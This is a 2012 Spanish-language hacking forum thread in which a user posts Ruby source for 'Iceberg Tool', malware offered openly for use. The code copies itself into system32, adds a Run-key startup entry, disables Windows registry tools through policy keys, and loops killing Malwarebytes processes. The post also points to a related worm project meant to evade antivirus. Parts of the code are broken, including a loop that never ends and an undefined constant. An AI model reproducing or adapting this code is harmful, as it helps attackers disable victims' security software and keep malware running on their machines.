[Ruby] Iceberg Tool - Sanko

  • 1 Respuestas
  • 2075 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de

[Ruby] Iceberg Tool - Sanko

  • en: Octubre 16, 2012, 05:34:46 pm
Para recordar viejos tiempos , pasar un buen rato y practicar un poco he codeado un ejemplo de iceberg asi como el version publica que se publico hace un (mucho) tiempo.

Advertencia : Esta version del Iceberg es una SIMPLE TRADUCCION de Iceberg Tool Generator Public Version
Lo que significa que no es capaz de evadir a los Antivirus mas actualizados asi como Kaspersky o Nod 32
Para evadirlos existe el Iceberg worm que estan desarrollando Velario y Slore -> http://icebergworm.es/

Código: Ruby
  1. ############################################################################################################
  2. #                                                                                                          #
  3. # Iceberg Tool Ruby Version  -  Using Malwarebytes like example...                                                         #
  4. # Coded by Sanko                                                                      #
  5. # Advertencia : Esta version del Iceberg es una SIMPLE TRADUCCION de Iceberg Tool Generator Public Version #
  6. # Lo que significa que no es capaz de evadir a los Antivirus mas actualizados asi como Kaspersky o Nod 32  #
  7. # Para evadirlos existe el Iceberg worm que estan desarrollando Velario y Slore -> IcebergWorm.es          #
  8. #                                                                                                          #
  9. ############################################################################################################
  10.  
  11. require "win32ole"
  12. require 'win32/registry'
  13. require 'ftools'
  14.  
  15. def killprocess(process)
  16.    require "win32ole"
  17.     var = WIN32OLE.connect("winmgmts://")
  18.     kill = var.ExecQuery("select * from Win32_process where name='#{process}'")
  19.     kill.each do |proceso|
  20.        proceso.Terminate
  21.     end
  22. end
  23.  
  24. def deshabilitarreg()
  25.    system('REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /F')
  26. end
  27.  
  28. def deshabilitartaskman()
  29.    system('REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /F')
  30. end
  31.  
  32. def autocopy()
  33.    File.copy('Iceberg.exe', 'C:\WINDOWS\system32\iceberg.exe')
  34. end
  35.  
  36. def registrar()
  37.    runrute = 'Software\Microsoft\Windows\CurrentVersion\Run'
  38.    folderkey = 'iceberg'
  39.    Win32::Registry::HKEY_CURRENT_USER.open(Run_branch , Win32::Registry::Constants::KEY_ALL_ACCESS) do |reg|
  40.       reg[folderkey] = 'C:\WINDOWS\system32\iceberg.exe'
  41.    end
  42.    autocopy()
  43.    deshabilitarreg()
  44.    deshabilitartaskman()
  45. end
  46.  
  47. def autokill()
  48.    killprocess('mbam.exe')
  49.    killprocess('mbamgui.exe')
  50.    killprocess('mbampt.exe')
  51.    killprocess('mbamscheduler.exe')
  52.    killprocess('mbamservice.exe')
  53.    killprocess('mbam-chamaleon.exe')
  54.    killprocess('mbam-killer.exe')
  55. end
  56.  
  57. def main()
  58.    var = 0
  59.    registrar()
  60.    while var < 10
  61.       autokill()
  62.    end
  63. end
  64.  
  65. main()

Saludos...
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Slore

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
  • OrwaySoftware
  • Skype: OrwaySoftware
    • Ver Perfil
    • Email

Re:[Ruby] Iceberg Tool - Sanko

  • en: Octubre 21, 2012, 09:59:20 am
Veo que estas destacando ultimamente enRuby, debe de ser una satisfaccion poder codear en un leguaje bueno y no basico.

 

[Ruby] Traductor de Decimal a Ascii / Ascii a Decimal

Iniciado por ANTRAX

Respuestas: 0
Vistas: 2852
Último mensaje Febrero 24, 2010, 04:16:38 pm
por ANTRAX
Lenguaje Ruby, aprendiendo poco a poco.

Iniciado por Alejandro_99

Respuestas: 2
Vistas: 3158
Último mensaje Agosto 15, 2013, 02:58:39 pm
por Alejandro_99
Crafting rails 4 applications (Manual de Ruby on Rails 4)

Iniciado por Alejandro_99

Respuestas: 0
Vistas: 1995
Último mensaje Marzo 01, 2014, 05:34:50 pm
por Alejandro_99
Desarrollo de aplicaciones Perl, PHP, Python y "Ruby on Rails"

Iniciado por Alejandro_99

Respuestas: 0
Vistas: 2475
Último mensaje Junio 13, 2014, 03:27:08 pm
por Alejandro_99
Como Instalar RubyMine y Crear un proyecto vacio para Ruby y Rails

Iniciado por Alejandro_99

Respuestas: 0
Vistas: 2900
Último mensaje Julio 07, 2013, 10:51:08 pm
por Alejandro_99